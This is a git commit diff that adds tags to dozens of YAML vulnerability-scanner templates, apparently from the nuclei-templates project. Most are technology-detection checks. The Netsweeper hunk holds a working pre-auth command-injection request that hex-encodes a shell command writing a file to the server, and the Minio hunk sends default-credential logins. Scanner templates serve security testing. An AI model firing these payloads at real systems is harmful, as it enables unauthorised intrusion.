Coverage for all templates using tags

patch-1
sandeep 2021-09-09 19:08:13 +05:30
parent 576499034d
commit bd24dc198e
62 changed files with 124 additions and 20 deletions

View File

@ -6,6 +6,7 @@ info:
severity: critical severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800 reference: https://github.com/amartinsec/CVE-2020-12800
tags: cve,cve2020,wordpress,wp-plugin
requests: requests:
- raw: - raw:

View File

@ -9,13 +9,15 @@ info:
reference: reference:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
additional-fields:
hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
requests: requests:
- method: GET - method: GET
path: path:
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out" - "{{BaseURL}}/webadmin/out"
headers: headers:
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"

View File

@ -8,6 +8,7 @@ info:
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik author: geeknik
severity: medium severity: medium
tags: cve,cve2021,xss,npm
requests: requests:
- raw: - raw:

View File

@ -4,23 +4,27 @@ info:
name: Minio Default Password name: Minio Default Password
author: pikpikcu author: pikpikcu
severity: medium severity: medium
tags: default-login,minio
requests: requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/minio/webrpc" - "{{BaseURL}}/minio/webrpc"
headers: headers:
Content-Type: application/json Content-Type: application/json
body: |
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST - method: POST
path: path:
- "{{BaseURL}}/minio/webrpc" - "{{BaseURL}}/minio/webrpc"
headers: headers:
Content-Type: application/json Content-Type: application/json
body: |
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -1,9 +1,11 @@
id: prometheus-exposed-panel id: prometheus-exposed-panel
info: info:
name: Prometheus.io exposed panel name: Prometheus.io exposed panel
author: organiccrap author: organiccrap
severity: low severity: low
# usually runs on port http/9090 tags: panel,prometheus
requests: requests:
- method: GET - method: GET
path: path:
@ -12,4 +14,4 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- <title>Prometheus Time Series Collection and Processing Server</title> - '<title>Prometheus Time Series Collection and Processing Server</title>'

View File

@ -4,7 +4,8 @@ info:
name: View Yii Debugger Information name: View Yii Debugger Information
author: geeknik author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
severity: info severity: low
tags: yii,debug,exposure
requests: requests:
- method: GET - method: GET
@ -16,11 +17,14 @@ requests:
- "{{BaseURL}}/sapi/debug/default/view" - "{{BaseURL}}/sapi/debug/default/view"
redirects: true redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "<title>Yii Debugger</title>" - "<title>Yii Debugger</title>"

View File

@ -5,6 +5,7 @@ info:
author: philippedelteil author: philippedelteil
severity: info severity: info
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
tags: exposure,shoppable,token
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: JTeles,pikpikcu author: JTeles,pikpikcu
severity: info severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
tags: misconfig,exposure,frontpage
requests: requests:
- method: GET - method: GET

View File

@ -1,18 +1,22 @@
id: artica-web-proxy-detect id: artica-web-proxy-detect
info: info:
name: Artica Web Proxy Detect name: Artica Web Proxy Detect
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,artica,proxy
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/fw.login.php" - "{{BaseURL}}/fw.login.php"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "Welcome to the Artica Web Administration Interface" - "Welcome to the Artica Web Administration Interface"
- type: status - type: status
status: status:
- 200 - 200

View File

@ -4,6 +4,7 @@ info:
name: Basic auth detection name: Basic auth detection
author: w4cky_ author: w4cky_
severity: info severity: info
tags: tech,basic-auth
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: BIG-IP Configuration Utility detected name: BIG-IP Configuration Utility detected
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,bigip
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: joanbono author: joanbono
severity: info severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference reference: https://portswigger.net/burp/documentation/enterprise/api-reference
tags: burp,tech
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/ description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info severity: info
tags: tech,cacti
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: clockwork-php-page id: clockwork-php-page
info: info:
name: Clockwork PHP page exposure name: Clockwork PHP page exposure
author: organiccrap author: organiccrap
severity: high severity: high
reference: https://twitter.com/damian_89_/status/1250721398747791360 reference: https://twitter.com/damian_89_/status/1250721398747791360
tags: tech,clockwork
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit name: Detect Agentejo Cockpit
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,cockpit
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac6-detect id: dell-idrac6-detect
info: info:
name: Detect Dell iDRAC6 name: Detect Dell iDRAC6
author: kophjager007 author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info severity: info
tags: tech,dell
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac7-detect id: dell-idrac7-detect
info: info:
name: Detect Dell iDRAC7 name: Detect Dell iDRAC7
author: kophjager007 author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info severity: info
tags: tech,dell
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac8-detect id: dell-idrac8-detect
info: info:
name: Detect Dell iDRAC8 name: Detect Dell iDRAC8
author: kophjager007 author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info severity: info
tags: tech,dell
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac9-detect id: dell-idrac9-detect
info: info:
name: Detect Dell iDRAC9 name: Detect Dell iDRAC9
author: kophjager007 author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info severity: info
tags: tech,dell
requests: requests:
- method: GET - method: GET

View File

@ -10,6 +10,7 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak - https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
tags: tech,favicon
requests: requests:
- method: GET - method: GET

View File

@ -5,11 +5,13 @@ info:
author: organiccrap author: organiccrap
severity: low severity: low
reference: http://ghostlulz.com/google-exposed-firebase-database/ reference: http://ghostlulz.com/google-exposed-firebase-database/
tags: tech,firebase
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
matchers: matchers:
- type: word - type: word
words: words:

View File

@ -4,6 +4,7 @@ info:
name: Google Bucket detection name: Google Bucket detection
author: 0xTeles author: 0xTeles
severity: info severity: info
tags: tech,gstorage,google,bucket
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: GraphQL API Detection name: GraphQL API Detection
author: NkxxkN,ELSFA7110 author: NkxxkN,ELSFA7110
severity: info severity: info
tags: tech,graphql
requests: requests:
- method: POST - method: POST

View File

@ -4,6 +4,7 @@ info:
name: Detect Graylog REST API name: Detect Graylog REST API
author: PR3R00T author: PR3R00T
severity: info severity: info
tags: tech,graylog
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: gunicorn-detect id: gunicorn-detect
info: info:
name: Detect Gunicorn Server name: Detect Gunicorn Server
author: joanbono author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info severity: info
tags: tech,gunicorn
requests: requests:
- method: GET - method: GET

View File

@ -1,8 +1,10 @@
id: harbor-detect id: harbor-detect
info: info:
name: Harbor Detect name: Harbor Detect
author: pikpikcu author: pikpikcu
severity: info severity: info
tags: tech,harbor
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Home Assistant name: Detect Home Assistant
author: fabaff author: fabaff
severity: info severity: info
tags: tech,iot
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: milo2012 author: milo2012
severity: info severity: info
description: Version of HP iLO description: Version of HP iLO
tags: tech,ilo
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Jaspersoft detected name: Jaspersoft detected
author: koti2 author: koti2
severity: info severity: info
tags: tech,jaspersoft
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Jellyfin detected name: Jellyfin detected
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,jellyfin
requests: requests:
- method: GET - method: GET
@ -13,6 +14,8 @@ requests:
- "{{BaseURL}}/index.html" - "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json" - "{{BaseURL}}/web/manifest.json"
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
@ -22,6 +25,7 @@ requests:
- "The Free Software Media System" - "The Free Software Media System"
condition: or condition: or
part: body part: body
- type: status - type: status
status: status:
- 200 - 200

View File

@ -4,11 +4,13 @@ info:
name: Jolokia Version Disclosure name: Jolokia Version Disclosure
author: mavericknerd,dwisiswant0 author: mavericknerd,dwisiswant0
severity: info severity: info
tags: tech,jolokia
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/jolokia/version' - '{{BaseURL}}/jolokia/version'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
@ -17,6 +19,7 @@ requests:
- '"protocol":' - '"protocol":'
- '"agent":' - '"agent":'
condition: and condition: and
- type: status - type: status
status: status:
- 200 - 200

View File

@ -4,6 +4,7 @@ info:
name: Kibana Service Detection name: Kibana Service Detection
author: petruknisme author: petruknisme
severity: info severity: info
tags: tech,kibana
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik author: geeknik
description: The Cloud-Native API Gateway - https://github.com/Kong/kong description: The Cloud-Native API Gateway - https://github.com/Kong/kong
severity: info severity: info
tags: tech,kong
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,11 @@
id: liferay-portal-detect id: liferay-portal-detect
info: info:
name: Liferay Portal Detection name: Liferay Portal Detection
author: organiccrap,dwisiswant0 author: organiccrap,dwisiswant0
severity: info severity: info
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
tags: tech,liferay
requests: requests:
- method: GET - method: GET

View File

@ -1,15 +1,11 @@
id: linkerd-badrule-detect id: linkerd-badrule-detect
# Detect the Linkerd service by overriding the delegation table with an invalid
# rule, the presence of the service is indicated by either:
# - a "Via: .. linkerd .."
# - a "l5d-err" and/or a "l5d-success" header
# - a literal error in the body
info: info:
name: Linkerd detection via bad rule name: Linkerd detection via bad rule
author: dudez author: dudez
severity: info severity: info
tags: tech,linkerd
reference: https://linkerd.io
requests: requests:
- method: GET - method: GET

View File

@ -1,8 +1,10 @@
id: lotus-domino-version id: lotus-domino-version
info: info:
name: Lotus Domino Version Extractor name: Lotus Domino Version Extractor
author: CasperGN author: CasperGN
severity: info severity: info
tags: tech,lotus
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -1,13 +1,17 @@
id: metabase-version-detect id: metabase-version-detect
info: info:
name: Detect Metabase Version name: Detect Metabase Version
author: revblock author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info severity: info
tags: tech,metabase
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/auth/login" - "{{BaseURL}}/auth/login"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -1,9 +1,11 @@
id: mrtg-detect id: mrtg-detect
info: info:
name: Detect MRTG name: Detect MRTG
author: geeknik author: geeknik
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
severity: info severity: info
tags: tech,mrtg
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin detected name: Netsweeper WebAdmin detected
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,netsweeper
requests: requests:
- method: GET - method: GET

View File

@ -1,9 +1,12 @@
id: nginx-version id: nginx-version
info: info:
name: nginx version detect name: nginx version detect
author: philippedelteil author: philippedelteil
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
severity: info severity: info
tags: tech,nginx
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -4,6 +4,7 @@ info:
name: Apache NiFi detect name: Apache NiFi detect
author: dwisiswant0 author: dwisiswant0
severity: info severity: info
tags: tech,apache,nifi
requests: requests:
- method: GET - method: GET
@ -15,6 +16,7 @@ requests:
- "{{BaseURL}}/flow/registries" - "{{BaseURL}}/flow/registries"
- "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/system-diagnostics"
- "{{BaseURL}}/nifi-api/access/config" - "{{BaseURL}}/nifi-api/access/config"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
@ -22,6 +24,7 @@ requests:
- "supportsLogin" - "supportsLogin"
- "disconnectedNodeAcknowledged" - "disconnectedNodeAcknowledged"
- "(aggregate|node)Snapshots?" - "(aggregate|node)Snapshots?"
- type: status - type: status
status: status:
- 200 - 200

View File

@ -1,9 +1,11 @@
id: oidc-detect id: oidc-detect
info: info:
name: Detect OpenID Connect provider name: Detect OpenID Connect provider
author: jarijaas author: jarijaas
severity: info severity: info
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
tags: tech,oidc
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect OpenAM and OpenSSO name: Detect OpenAM and OpenSSO
author: philippedelteil author: philippedelteil
severity: info severity: info
tags: tech,openam
requests: requests:
- method: GET - method: GET

View File

@ -1,8 +1,10 @@
id: pi-hole-detect id: pi-hole-detect
info: info:
name: pi-hole detector name: pi-hole detector
author: geeknik author: geeknik
severity: info severity: info
tags: tech,pihole
requests: requests:
- method: GET - method: GET
@ -14,6 +16,7 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "Pi-hole" - "Pi-hole"

View File

@ -1,9 +1,11 @@
id: prtg-detect id: prtg-detect
info: info:
name: Detect PRTG name: Detect PRTG
author: geeknik author: geeknik
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
severity: info severity: info
tags: tech,prtg
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik author: geeknik
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
severity: info severity: info
tags: tech,redmine
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Amazon-S3 Bucket name: Detect Amazon-S3 Bucket
author: melbadry9 author: melbadry9
severity: info severity: info
tags: aws,s3,bucket,tech
requests: requests:
- method: GET - method: GET

View File

@ -1,16 +1,20 @@
id: shiro-detect id: shiro-detect
info: info:
name: Detect Shiro Framework name: Detect Shiro Framework
author: AresX author: AresX
severity: info severity: info
tags: tech,shiro
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}' - '{{BaseURL}}'
headers: headers:
Cookie: rememberMe=123; Cookie: rememberMe=123;
matchers: matchers:
- type: word - type: word
words: words:
- rememberMe=deleteMe - 'rememberMe=deleteMe'
part: header part: header

View File

@ -4,13 +4,17 @@ info:
name: Detect Springboot Actuators name: Detect Springboot Actuators
author: that_juan_,dwisiswant0,wdahlenb author: that_juan_,dwisiswant0,wdahlenb
severity: info severity: info
tags: tech,springboot,actuator
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}"
- "{{BaseURL}}/actuator" - "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico" - "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/actuator/favicon.ico"
stop-at-first-match: true
matchers-condition: or matchers-condition: or
matchers: matchers:
- type: word - type: word

View File

@ -4,6 +4,7 @@ info:
name: Detect Microsoft SQL Server Reporting name: Detect Microsoft SQL Server Reporting
author: puzzlepeaches author: puzzlepeaches
severity: info severity: info
tags: tech,micrsoft
requests: requests:
- method: GET - method: GET

View File

@ -4,11 +4,13 @@ info:
name: Detect Telerik Web UI fileupload handler name: Detect Telerik Web UI fileupload handler
author: organiccrap author: organiccrap
severity: info severity: info
tags: tech,telerik
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
matchers: matchers:
- type: word - type: word
words: words:

View File

@ -1,9 +1,11 @@
id: terraform-detect id: terraform-detect
info: info:
name: Detect Terraform Provider name: Detect Terraform Provider
author: geeknik author: geeknik
description: Write Infrastructure as Code - https://www.terraform.io/ description: Write Infrastructure as Code - https://www.terraform.io/
severity: info severity: info
tags: tech,terraform
requests: requests:
- method: GET - method: GET

View File

@ -1,10 +1,12 @@
id: tomcat-version-detect id: tomcat-version
info: info:
name: Detect Tomcat Version name: Detect Tomcat Version
author: philippedelteil author: philippedelteil
description: If an Tomcat instance is deployed on the target URL, when we send a request for description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
a non existent resource we receive a Tomcat error page with version.
severity: info severity: info
tags: tech,tomcat,apache
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -1,8 +1,10 @@
id: tor-socks-proxy id: tor-socks-proxy
info: info:
name: Detect tor SOCKS proxy name: Detect tor SOCKS proxy
author: geeknik author: geeknik
severity: info severity: info
tags: tech,tor,proxy
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Weblogic name: Detect Weblogic
author: bing0o author: bing0o
severity: info severity: info
tags: tech,weblogic
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
name: Werkzeug debugger console name: Werkzeug debugger console
author: pdteam author: pdteam
severity: info severity: info
tags: tech,werkzeug
requests: requests:
- method: GET - method: GET

View File

@ -8,6 +8,7 @@ info:
reference: reference:
- https://www.securifera.com/advisories/sec-2020-0001/ - https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
tags: rce,listserv,ognl
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
reference: https://www.freebuf.com/articles/system/125177.html reference: https://www.freebuf.com/articles/system/125177.html
tags: injection,cacti
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu author: pikpikcu
severity: info severity: info
reference: https://www.exploit-db.com/exploits/27888 reference: https://www.exploit-db.com/exploits/27888
tags: exposure,resin
requests: requests:
- method: GET - method: GET

View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: high severity: high
reference: https://www.exploit-db.com/exploits/49054 reference: https://www.exploit-db.com/exploits/49054
tags: lfi,pmb
requests: requests:
- method: GET - method: GET

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
reference: https://www.exploit-db.com/exploits/48877 reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
requests: requests:
- raw: - raw:
- | - |

View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
reference: https://www.exploit-db.com/exploits/48880 reference: https://www.exploit-db.com/exploits/48880
tags: auth-bypass,zms
requests: requests:
- raw: - raw: